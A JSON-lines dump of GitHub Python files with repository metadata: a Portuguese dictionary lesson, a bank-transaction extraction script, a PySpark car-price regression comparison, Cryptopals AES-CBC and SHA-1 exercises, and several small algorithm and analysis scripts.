que eu vou armazenar\r\n# valor = o dado que eu quero armazenar\r\n\r\npessoa = {'Nome': 'Tiago',\r\n 'Idade': 17,\r\n 'Cidade': 'Taboão da Serra'}\r\n\r\n\r\npessoas = [\r\n {'Nome': 'Tiago',\r\n 'Idade': 17,\r\n 'Cidade': 'Taboão da Serra'},\r\n\r\n {'Nome': 'João',\r\n 'Idade': 19,\r\n 'Cidade': 'Mogi das Cruzes'},\r\n\r\n {'Nome': 'Rodrigo',\r\n 'Idade': 5,\r\n 'Cidade': 'Embu das Artes'}\r\n\r\n] \r\n\r\nprint(pessoas[2]['Nome'])\r\n","repo_name":"Tiaguh/Python-Curso-PSW-4.0","sub_path":"Conceitos Básicos/Estrutura de dados/Dicionarios.py","file_name":"Dicionarios.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6213677325","text":"import io\nimport os\nimport traceback\n\nfrom ruamel.yaml import YAML\nfrom selenium.webdriver import ChromeOptions\nfrom splinter import Browser\n\nfrom src.converters.converter import convert\nfrom src.extractors import extract\nfrom src.writers import write\n\n\nclass Struct:\n def __init__(self, **kwargs):\n for key in kwargs:\n if type(kwargs[key]) is dict:\n kwargs[key] = Struct(**kwargs[key])\n elif type(kwargs[key]) is list:\n kwargs[key] = [Struct(**x) if type(x) in (dict, list) else x for x in kwargs[key]]\n self.__dict__.update(kwargs)\n\n\nclass Main:\n def __init__(self, config, last_transaction):\n self.last_transaction = last_transaction\n self.config = config\n\n def execute(self):\n if self.config.options.browser.enable:\n options = ChromeOptions()\n options.add_argument('--log-level=3')\n with Browser('chrome', executable_path=chrome_driver_path, headless=self.config.options.browser.headless,\n incognito=self.config.options.browser.incognito, options=options) as browser:\n self._execute(browser)\n else:\n self._execute(None)\n\n def _execute(self, browser):\n transactions = []\n for extractor_config in self.config.extractors:\n extracted_transaction = extract(extractor_config, browser, self.last_transaction, self.config.options)\n transactions += convert(extracted_transaction, extractor_config.transaction.converters)\n\n if len(transactions) > 0:\n write(self.config.writer, transactions)\n\n\ntry:\n yaml = YAML(typ=\"safe\", pure=True)\n yaml.register_class(Struct)\n chrome_driver_path = os.path.join(os.getcwd(), 'chromedriver.exe')\n\n with io.open('config.yml', mode='r', encoding='utf-8') as _f:\n _config = Struct(**yaml.load(_f))\n\n with io.open('last-transaction.yml', mode='r', encoding='utf-8') as _f:\n _last_transaction = yaml.load(_f)\n if not isinstance(_last_transaction, Struct):\n _last_transaction = Struct(**_last_transaction)\n\n Main(_config, _last_transaction).execute()\n\n if _config.options.rememberLastTransaction:\n with io.open('last-transaction.yml', mode='w', encoding='utf-8') as _f:\n yaml.dump(_last_transaction, _f)\nexcept Exception:\n print(traceback.format_exc())\n\ninput(\"Press Enter to end...\")\n","repo_name":"FennecFox100/BankTransactionsTransfer","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43980752776","text":"from io import BytesIO, StringIO\nfrom google.cloud import storage\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkContext, SparkConf \nfrom pyspark.sql import types\nfrom pyspark.sql import functions as F\nfrom pyspark.ml.feature import Imputer, VectorAssembler, StringIndexer, OneHotEncoder\nfrom pyspark.sql.types import StringType, IntegerType, StructType, StructField, DoubleType\nfrom pyspark.sql.functions import when, upper, avg, year, to_date, sqrt, log, lower, col, row_number, asc, lit, count, expr, percentile_approx, monotonically_increasing_id, udf, skewness, regexp_extract\nfrom pyspark.sql.window import Window\n#from plotly.offline import iplot\n#import plotly.graph_objs as go\nfrom pyspark.sql.functions import round\n#import plotly.express as px\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.regression import LinearRegression, IsotonicRegression, FMRegressor, DecisionTreeRegressor, RandomForestRegressor, GBTRegressor, GeneralizedLinearRegression\nfrom pyspark.ml import Pipeline\n\n# Utilities\nimport os\n\n# Numpy & Pandas\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#import pandas_profiling as pp\nimport time\nimport psutil\n\n# Others (warnings etc)\nfrom warnings import simplefilter\n\n\n# Create a SparkSession\nspark = SparkSession.builder.config('...').master('yarn').appName('egd').getOrCreate()\n# spark = SparkSession.builder.config('spark.driver.memory', '1g').config('spark.executor.memory', '4g') \\\n# .config('spark.executor.instances', '2').config(conf=conf).config('spark.executor.cores','2').config('spark.driver.maxResultSize', '1g') \\\n# .master('yarn').appName('egd').getOrCreate()\n\nfile_path = 'gs://egd-project-vp-1/egd-project/notebooks_jupyter_notebooks_jupyter_vehicles.csv'\ndf = (spark.read.format('csv').option('header', 'true').option('inferSchema','true').load(file_path))\n\n# CLEANING SIMPLIFIED # \n\n# Determine and remove the columns to drop based on the above graph\ncols_to_drop = ['id','url', 'region', 'region_url', 'VIN', 'image_url', 'description', \\\n 'county', 'size', 'paint_color', 'drive', 'cylinders', 'state', 'lat','long']\nvehicles_df = df.select([col(c) for c in df.columns if c not in cols_to_drop])\n\n# Remove null values and duplicated rows\nvehicles_df = vehicles_df.dropna().dropDuplicates()\n\n# Drop NaNs and duplicates\nvehicles_df = vehicles_df.dropna().dropDuplicates()\n\n# Add index column using monotonically_increasing_id() function\nvehicles_df = vehicles_df.withColumn(\"index\", monotonically_increasing_id())\n\n# Change data type of year to string\nvehicles_df = vehicles_df.withColumn(\"year\", col(\"year\").cast(\"string\"))\n\n# Reorder columns with index first\nvehicles_df = vehicles_df.select(\"index\", *vehicles_df.columns[:-1])\n\n# Describing the dataset to get a basic idea of the non-categorical features\nvehicles_df.select([col(c).cast(\"float\") for c in vehicles_df.columns if c not in ['manufacturer', 'model', 'condition', 'fuel', 'title_status', 'transmission', 'type']])\n\n# Create a new Spark DataFrame with the filtered data\nvehicles_prc = vehicles_df.filter((vehicles_df.price >= 2000) & (vehicles_df.price <= 50000))\n\nvehicles_odo = vehicles_prc.filter((col(\"odometer\") > 100) & (col(\"odometer\") <= 200000))\n\nyear_list = list(range(2000, 2021))\nvehicles_year = vehicles_odo.filter(col('year').cast(IntegerType()).isin(year_list))\n\n# Convert posting_date to a date type\nvehicles_year = vehicles_year.withColumn('posting_date', to_date('posting_date'))\n\n# Add a new column for age of cars\nvehicles_year = vehicles_year.withColumn('age', year('posting_date') - vehicles_year['year'])\n\n# Group by condition and title_status columns and aggregate the mean of price\ngrouped_df = vehicles_year.groupBy('condition', 'title_status').agg({'price': 'mean'})\n\n# Filter the Spark DataFrame to include only used cars\nvehicles_used = vehicles_year.filter(col('condition') != 'new')\n\n# Filter the Spark DataFrame to exclude cars with title_status 'parts only'\nvehicles_used = vehicles_used.filter(col('title_status') != 'parts only')\n\n# Group by condition and title_status columns and aggregate the mean of price\ngrouped_df = vehicles_used.groupBy('condition', 'title_status').agg({'price': 'mean'})\n\n# Filter the Spark DataFrame to include only used cars\nvehicles_used = vehicles_year.filter(col('condition') != 'new')\n\n# Filter the Spark DataFrame to exclude cars with title_status 'parts only'\nvehicles_used = vehicles_used.filter(col('title_status') != 'parts only')\n\n# Filter the Spark DataFrame to include only used cars\nvehicles_used = vehicles_year.filter(col('condition') != 'new')\n\n# Filter the Spark DataFrame to exclude cars with title_status 'parts only'\nvehicles_used = vehicles_used.filter(col('title_status') != 'parts only')\n\n# Filter the Spark DataFrame to exclude fuel types 'other'\nvehicles_used = vehicles_used.filter(col('fuel') != 'other')\n\n# Filter the Spark DataFrame to exclude transmission types 'other'\nvehicles_used = vehicles_used.filter(col('transmission') != 'other')\n\n# Add a field for row numbers\nvehicles_used = vehicles_used.withColumn(\"row_num\", row_number().over(Window.orderBy(col(\"model\"))))\n\n\n###########\n\n\nprint('-----------------------------------------')\nprint('----------- Price Prediction ------------')\nprint('-----------------------------------------')\nprint('')\n\n\n\n\n\n\n# Get current information of the dataset\nvehicles_used.printSchema()\n\n# Drop columns populated during clean-up or not required\nvehicles_used = vehicles_used.drop('posting_date', 'row_num')\n\n\n# Make a copy of the data frame for encoding\nvehicles_used_enc = vehicles_used\n\n# Print schema of the encoded DataFrame\nvehicles_used_enc.printSchema()\nvehicles_used_enc2 = vehicles_used_enc\n\n\nvehicles_used_enc2.show()\n\n# Cast the string column to double\nvehicles_used_enc = vehicles_used_enc.withColumn(\"price\", col(\"price\").cast(\"long\"))\n\nvehicles_used_enc = vehicles_used_enc.withColumn(\"odometer\", col(\"odometer\").cast(\"double\"))\n\n\nfrom pyspark.ml.feature import StringIndexer, OneHotEncoder\nfrom pyspark.ml import Pipeline\n\n# Get fields that are categorical and remove only \"model\"\ncat_features = [c for c, dtype in vehicles_used_enc.dtypes if dtype == 'string']\nprint(f'Categorical features: {cat_features}\\n\\n')\n\n# Encode using StringIndexer\nfor c in cat_features:\n indexer = StringIndexer(inputCol=c, outputCol=c+\"_indexed\")\n model = indexer.fit(vehicles_used_enc)\n vehicles_used_enc = model.transform(vehicles_used_enc).drop(c)\n vehicles_used_enc = vehicles_used_enc.withColumnRenamed(c+\"_indexed\", c)\n\n\n# drop row number column\nvehicles_used_enc = vehicles_used_enc.drop(\"index\")\nvehicles_used_enc.show()\n\nvehicles_used_enc.printSchema()\n\n\n\nfeatures = VectorAssembler(inputCols = [\n 'odometer',\n 'age',\n 'year',\n 'manufacturer',\n 'model',\n 'condition',\n 'fuel',\n 'title_status',\n 'transmission',\n 'type'],outputCol='features', handleInvalid = 'skip')\n\ntraining_features = features.transform(vehicles_used_enc)\ntraining_features = training_features.select('price','features')\nprint('\\n--- ML dataset ---\\n')\ntraining_features.show(5)\n#split ML dataset in train (.8) and test (.2)\ntrain_data, test_data = training_features.randomSplit([0.8,0.2])\nprint('\\n--- Train Data ---\\n')\ntrain_data.show(5)\nprint('\\n--- Test Data ---\\n')\ntest_data.show(5)\nprint('\\n--- Data Used for the Prediction---\\n')\n# amostrar aleatoriamente 5% dos dados para teste\ntest_data_sample = test_data.sample(fraction=0.05, seed=123)\n\n# exibir as primeiras linhas do DataFrame\ntest_data_sample.show(5)\n\n\n\ndef reg_metrics(model, train_data, test_data, algo):\n \"\"\" Function takes in training and testing sets, prediction model, \n and ouputs the below metrics:\n 1. R² or Coefficient of Determination.\n 2. Adjusted R²\n 3. Mean Squared Error(MSE)\n 4. Root-Mean-Squared-Error(RMSE).\n 5. Mean-Absolute-Error(MAE).\n \"\"\"\n # Get predicted values on test_data\n test_pred = model.transform(test_data)\n \n #1 & 2 Coefficient of Determination (R² & Adjusted R²)\n print(\"\\n\\t--- Coefficient of Determination (R² & Adjusted R²) ---\")\n evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"r2\")\n r2 = evaluator.evaluate(test_pred)\n adj_r2 = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"r2adj\")\n adj_r2 = evaluator.evaluate(test_pred)\n\n print(f\"R²\\t\\t: {r2:.5f}\")\n print(f\"Adjusted R²\\t: {adj_r2:.5f}\")\n\n #3 & 4. MSE and RMSE\n print(\"\\n\\t--- Mean Squared Error (MSE & RMSE) ---\")\n mse_evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"mse\")\n mse = mse_evaluator.evaluate(test_pred)\n rmse_evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"rmse\")\n rmse = rmse_evaluator.evaluate(test_pred)\n \n print(f\"MSE\\t: {mse:.4f}\")\n print(f\"RMSE\\t: {rmse:.2f}\")\n\n #5. MAE\n print(\"\\n\\t--- Mean Absolute Error (MAE) ---\")\n mae_evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"mae\")\n mae = mae_evaluator.evaluate(test_pred)\n print(f\"MAE\\t: {mae:.2f}\")\n \n # Return metrics as a dictionary\n metrics_dict = {\n 'Algorithm': algo,\n 'R²': r2,\n 'Adjusted R²': adj_r2,\n 'MSE': mse,\n 'RMSE': rmse,\n 'MAE': mae\n }\n #'Adjusted R²': adj_r2_formatted,\n return metrics_dict\n\nmodel_metrics = []\nmodel_metrics_performance = []\n\n# LINEAR REGRESSION #\n# Measure execution time\nstart_time = time.time()\nprint(\"\\t------- Linear Regression -------\")\nlr = LinearRegression(\n featuresCol='features',\n labelCol='price',\n maxIter=100, # increase maxIter\n regParam=0.1, # try different values for regParam\n elasticNetParam=0.7 # try different values for elasticNetParam\n)\nlr_model = lr.fit(train_data)\nmetrics_dict_lr = reg_metrics(lr_model, train_data, test_data, 'Linear Regression')\nmodel_metrics.append(metrics_dict_lr)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = lr_model.evaluate(test_data_sample)\npred_results.predictions.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Linear Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# LASSO REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Lasso Regression -------\")\nlasso = LinearRegression(featuresCol='features', labelCol='price', maxIter=100, regParam=0.1, elasticNetParam=1)\nlasso_model = lasso.fit(train_data)\nmetrics_dict_lasso = reg_metrics(lasso_model, train_data, test_data, 'Lasso Regression')\nmodel_metrics.append(metrics_dict_lasso)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = lasso_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Lasso Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# LASSO REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Ridge Regression -------\")\nridge = LinearRegression(featuresCol = 'features', labelCol = 'price',maxIter=100, regParam=0.3, elasticNetParam=0.1)\nridge_model = ridge.fit(train_data)\nmetrics_dict_ridge = reg_metrics(ridge_model, train_data, test_data, 'Ridge Regression')\nmodel_metrics.append(metrics_dict_ridge)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = ridge_model.evaluate(test_data_sample)\npred_results.predictions.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\n\nmetrics_dict_time = {\n 'Algorithm':'Ridge Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# ISOTONIC REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Isotonic Regression -------\")\niso = IsotonicRegression(labelCol=\"price\", featuresCol=\"features\")\niso_model = iso.fit(train_data)\nmetrics_dict_iso = reg_metrics(iso_model, train_data, test_data, 'Isotonic Regression')\nmodel_metrics.append(metrics_dict_iso)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = iso_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Isotonic Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# FACTORIZATION MACHINES REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Factorization Machines Regression -------\")\n# Define the FMRegressor model\nfm = FMRegressor(featuresCol=\"features\", labelCol=\"price\", stepSize=0.01)\n# Train the model on the training data\nfm_model = fm.fit(train_data)\n\n# Evaluate the model on the training and test data\nmetrics_dict_fm = reg_metrics(fm_model, train_data, test_data, 'Factorization Machines Regression')\nmodel_metrics.append(metrics_dict_fm)\nprint(\"\\n\\t--- Predictions ---\")\n# Make predictions on the test data\npred_results = fm_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Factorization Machines',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n\n\n# DECISION TREE #\nstart_time = time.time()\nprint(\"\\t------- Decision Tree -------\")\ndt = DecisionTreeRegressor(featuresCol = 'features', labelCol = 'price', maxDepth=5, maxBins=40000)\ndt_model = dt.fit(train_data)\nmetrics_dict_dt = reg_metrics(dt_model, train_data, test_data, 'Decision Tree')\nmodel_metrics.append(metrics_dict_dt)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = dt_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Decision Tree',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# RANDOM FOREST REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Random Forest Regression -------\")\nrf = RandomForestRegressor(featuresCol = 'features', labelCol = 'price', numTrees=2, maxDepth=2, maxBins=40000)\nrf_model = rf.fit(train_data)\nmetrics_dict_rf = reg_metrics(rf_model, train_data, test_data, 'Random Forest Regression')\nmodel_metrics.append(metrics_dict_rf)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = rf_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Random Forest',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# GRADIENT BOOSTING REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Gradient Boosting Regression -------\")\ngb = GBTRegressor(featuresCol = 'features', labelCol = 'price', maxIter=10, maxDepth=5, seed=42, maxBins=40000)\ngb_model = gb.fit(train_data)\nmetrics_dict_gb = reg_metrics(gb_model, train_data, test_data, 'Gradient Boost Regression')\nmodel_metrics.append(metrics_dict_gb)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = gb_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Gradient Boosting',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# GENERALIZED LINEAR REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Generalized Linear Regression -------\")\nglr = GeneralizedLinearRegression(featuresCol = 'features', labelCol = 'price',family=\"gaussian\", link=\"identity\", maxIter=10, regParam=0.3)\nglr_model = glr.fit(train_data)\nmetrics_dict_glr = reg_metrics(glr_model, train_data, test_data, 'Generalized Linear Regression')\nmodel_metrics.append(metrics_dict_glr)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = glr_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\n\nmetrics_dict_time = {\n 'Algorithm':'Generalized Linear Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\nprint('------------------------------------------')\nprint('----------- Models Comparison ------------')\nprint('------------------------------------------')\nprint('')\n\n\n# Create a Spark DataFrame from the list of dictionaries\ndf_models1 = spark.createDataFrame(model_metrics)\n\n# Select columns in desired order and round the values to two decimal places\ndf_models = df_models1.withColumn(\"MSE\", col(\"MSE\").cast(\"decimal(20,2)\")).select(\"Algorithm\", \n round(\"R²\", 2).alias(\"R²\"), \n round(\"Adjusted R²\", 2).alias(\"Adjusted R²\"), \n \"MSE\", \n round(\"RMSE\", 2).alias(\"RMSE\"), \n round(\"MAE\", 2).alias(\"MAE\"))\n\n# Set the option to display the full column width\ndf_models.show()\n\n\n\n# Define the schema of the DataFrame\nschema = StructType([\n StructField(\"Algorithm\", StringType(), True),\n StructField(\"Execution Time\", DoubleType(), True),\n StructField(\"CPU usage\", DoubleType(), True),\n\n])\n\n# Create the DataFrame using the schema\ndf_models_performance = spark.createDataFrame(model_metrics_performance, schema=schema)\ndf_models_performance.show()\n","repo_name":"LuisPHenriques/EGD_Project","sub_path":"notebook-to-py/price-prediction.py","file_name":"price-prediction.py","file_ext":"py","file_size_in_byte":18075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25637812430","text":"class Solution:\n def validPath(self, n: int, edges: List[List[int]], source: int, destination: int) -> bool:\n\n dic = {i : i for i in range(n)}\n \n def find(ind):\n if dic[ind] != ind:\n dic[ind] = find(dic[ind])\n return dic[ind]\n return ind\n \n def union(x,y):\n xrep = find(x)\n yrep = find(y)\n \n dic[xrep] = yrep\n \n for x,y in edges:\n union(x,y)\n \n return find(source) == find(destination)","repo_name":"natiyeshi/A2SVproblems","sub_path":"find-if-path-exists-in-graph.py","file_name":"find-if-path-exists-in-graph.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19877962910","text":"\"\"\"S2C10. Implement CBC mode.\"\"\"\r\n\r\nimport base64\r\n\r\nfrom set_1 import c02_fixed_xor as xor\r\nfrom set_1 import c07_aes_in_ecb_mode as aes_ecb\r\nfrom set_2 import c09_pkcs7_padding as pkcs7_padding\r\n\r\n\r\nBLOCK_SIZE = 16\r\n\r\n\r\ndef aes_cbc(text, key, iv, encrypt=False): # pylint: disable=invalid-name\r\n \"\"\"Encrypts or decrypts using AES in CBC mode.\"\"\"\r\n\r\n # Make len(key) byte ciphertext blocks.\r\n blocks = [\r\n text[i:i + BLOCK_SIZE]\r\n for i in range(0, len(text), BLOCK_SIZE)\r\n ]\r\n\r\n state = iv\r\n out_blocks = b''\r\n for block in blocks:\r\n out_blocks += xor.fixed_xor(\r\n state,\r\n aes_ecb.aes_ecb(block, key, encrypt=encrypt))\r\n state = block\r\n\r\n return pkcs7_padding.unpad(out_blocks)\r\n\r\n\r\nif __name__ == '__main__':\r\n TEXT = base64.b64decode(''.join([\r\n line.strip()\r\n for line in open('c10_aes_in_cbc_mode_file', 'r')\r\n ]))\r\n KEY = b'YELLOW SUBMARINE'\r\n IV = bytes(BLOCK_SIZE)\r\n\r\n print(aes_cbc(TEXT, KEY, IV, encrypt=False).decode('ascii'))\r\n","repo_name":"yuethomas/cryptopals","sub_path":"set_2/c10_aes_in_cbc_mode.py","file_name":"c10_aes_in_cbc_mode.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32610252076","text":"def digest(word_list, h):\n\n # Raise exception if input word_list does not have correct amount of words\n if len(word_list) != 80:\n raise ValueError(\"Inputted list of words must have 80 words, but instead has {} words\".format(str(len(word_list))))\n\n a = h[0]\n b = h[1]\n c = h[2]\n d = h[3]\n e = h[4]\n \n \n # Determine which function to use depending on the posisition of the word in word_list\n for i in range(len(word_list)):\n\n if i <= 19:\n fk = _f1(word_list[i], a,b,c,d)\n\n elif i <= 39:\n fk = _f2(word_list[i], a,b,c,d)\n\n elif i <= 59:\n fk = _f3(word_list[i], a,b,c,d)\n\n else:\n fk = _f4(word_list[i], a,b,c,d)\n\n # temp = (a left rotate 5) + f + e + k + current word\n temp = bin(int(_left_rotate(a, 5), 2) + fk[0] + int(e,2) + fk[1] + int(word_list[i], 2))[2:]\n\n # Truncate left-most bits until temp is 32 bits long\n temp = _truncate(temp, 32)\n\n # Change the values of a, b, c, d, e for the next iteration\n e = d # e = d\n d = c # d = c\n c = _left_rotate(b, 30) # c = b left rotate 30\n b = a # b = a\n a = temp # a = temp\n\n\n # 5 parts of the digest, which will be combined after each chunk in sha.py is digested\n h[0] = _truncate(bin(int(h[0], 2) + int(a, 2))[2:], 32)\n h[1] = _truncate(bin(int(h[1], 2) + int(b, 2))[2:], 32)\n h[2] = _truncate(bin(int(h[2], 2) + int(c, 2))[2:], 32)\n h[3] = _truncate(bin(int(h[3], 2) + int(d, 2))[2:], 32)\n h[4] = _truncate(bin(int(h[4], 2) + int(e, 2))[2:], 32)\n\n\n return h\n\n\n \n\n\n\ndef _f1(word, a, b, c, d):\n\n # f = (b AND c) OR (!b AND c)\n f = (int(b,2) & int(c,2)) | ((~int(b,2)) & int(d,2))\n\n k = int(\"01011010100000100111100110011001\", 2)\n\n return f, k\n\n\n\ndef _f2(word, a, b, c, d):\n\n # f = b XOR c XOR d\n f = int(b,2) ^ int(c,2) ^ int(d,2)\n\n k = int(\"01101110110110011110101110100001\", 2)\n\n return f, k\n\n\n\ndef _f3(word, a, b, c, d):\n\n # f = (b AND c) OR (b AND d) OR (c AND d)\n f = (int(b,2) & int(c,2)) | (int(b,2) & int(d,2)) | (int(c,2) & int(d,2))\n\n k = int(\"10001111000110111011110011011100\", 2)\n\n return f, k\n\n\n\ndef _f4(word, a, b, c, d):\n\n # f = b XOR c XOR d\n f = int(b,2) ^ int(c,2) ^ int(d,2)\n\n k = int(\"11001010011000101100000111010110\", 2)\n \n return f, k\n\n\n\n\ndef _left_rotate(binary_string, amount):\n\n temp = binary_string[:amount]\n binary_string = binary_string[amount:] + temp\n return binary_string\n\n\n\n# Truncates from the left\ndef _truncate(binary_string, desired_amount):\n\n if len(binary_string) < desired_amount:\n return binary_string.zfill(desired_amount - len(binary_string))\n \n return binary_string[len(binary_string)-desired_amount:]\n","repo_name":"JoshGutman/SHA-1","sub_path":"digest.py","file_name":"digest.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41243190981","text":"\"\"\"Script for measuring optimality of semantic systems w.r.t the Pareto frontier = RD curve.\"\"\"\n\nimport os\nimport hydra\nimport pandas as pd\nfrom misc import util\nfrom analysis.measure import measure_optimality\n\n\n@hydra.main(version_base=None, config_path=\"../conf\", config_name=\"config\")\ndef main(config):\n util.set_seed(config.seed)\n\n # load datapaths\n cwd = os.getcwd()\n game_dir = cwd.replace(config.filepaths.simulation_subdir, \"\")\n curve_fn = os.path.join(game_dir, config.filepaths.curve_points_save_fn)\n fps = config.filepaths\n sim_fn = os.path.join(cwd, fps.simulation_points_save_fn)\n sampled_fn = os.path.join(game_dir, config.filepaths.sampled_points_save_fn)\n\n # load data\n curve_data = pd.read_csv(curve_fn)\n sim_data = pd.read_csv(sim_fn)\n sampled_data = pd.read_csv(sampled_fn)\n\n sim_optimality = measure_optimality(sim_data, curve_data)\n sim_data[\"optimality\"] = sim_optimality\n\n sampled_optimality = measure_optimality(sampled_data, curve_data)\n sampled_data[\"optimality\"] = sampled_optimality\n\n util.save_points_df(\n fn=sim_fn,\n df=sim_data,\n )\n util.save_points_df(\n fn=sampled_fn,\n df=sampled_data,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nathimel/rdsg","sub_path":"src/optimality.py","file_name":"optimality.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19052259337","text":"import numpy as np\nfrom src.gender_model import GenderModel\nfrom csv import reader, writer\n\ngm = GenderModel()\n\nwith open(\"input.csv\") as csvfile:\n csv_reader = reader(csvfile)\n next(csv_reader)\n rows = list(csv_reader)\n\ncount_accurate = 0\ncount_total = 0\n\nwith open(\"results.csv\", \"w\", newline=\"\") as f:\n csv_writer = writer(f)\n csv_writer.writerow([\"\", \"img_path\", \"gender\", \"prediction\", \"confidence\"])\n\n for row in rows:\n count_total += 1\n prediction = gm.predict(row[1])\n index_prediction = np.argmax(prediction)\n if (index_prediction == 0 and row[2] == \"female\") or (index_prediction == 1 and row[2] == \"male\"):\n count_accurate += 1\n csv_writer.writerow(\n [row[0], row[1], row[2], prediction, max(prediction)]\n )\n\n\ndef calculate_accuracy():\n accuracy = count_accurate / count_total\n print(f\"The model was {np.round(accuracy, 4) * 100}% accurate.\")\n\n\ncalculate_accuracy()\n","repo_name":"nachoiacovino/gsp-python","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30694509217","text":"class Node:\n def __init__(self,val):\n self.data = val\n self.next = None\n\ndef construct(L):\n root = Node(L[0])\n curr = root\n for i in range(1,len(L)):\n curr.next = Node(L[i])\n curr = curr.next\n return root\n\ndef partition(head,tail):\n if head == tail or not head or not tail:\n return head\n pivot,curr,pivot_data = head,head,tail.data\n while head != tail:\n if head.data < pivot_data:\n pivot = curr\n curr_data = curr.data\n curr.data = head.data\n head.data = curr_data\n curr = curr.next\n head = head.next\n \n curr_data = curr.data\n curr.data = pivot_data\n tail.data = curr_data\n return pivot\n\ndef quickSort(head,tail):\n if not head or head == tail or head == tail.next:\n return\n pivot = partition(head,tail)\n quickSort(head, pivot)\n \n if pivot and pivot == head:\n quickSort(pivot.next, tail)\n elif pivot and pivot.next:\n quickSort(pivot.next.next, tail)\n\ndef printList(root):\n while root:\n print(root.data,end=' ')\n root = root.next\n\ndef solution(L):\n # Write your code here...\n head = construct(L)\n tail = head\n while tail.next:\n tail = tail.next\n quickSort(head, tail)\n printList(head)\n 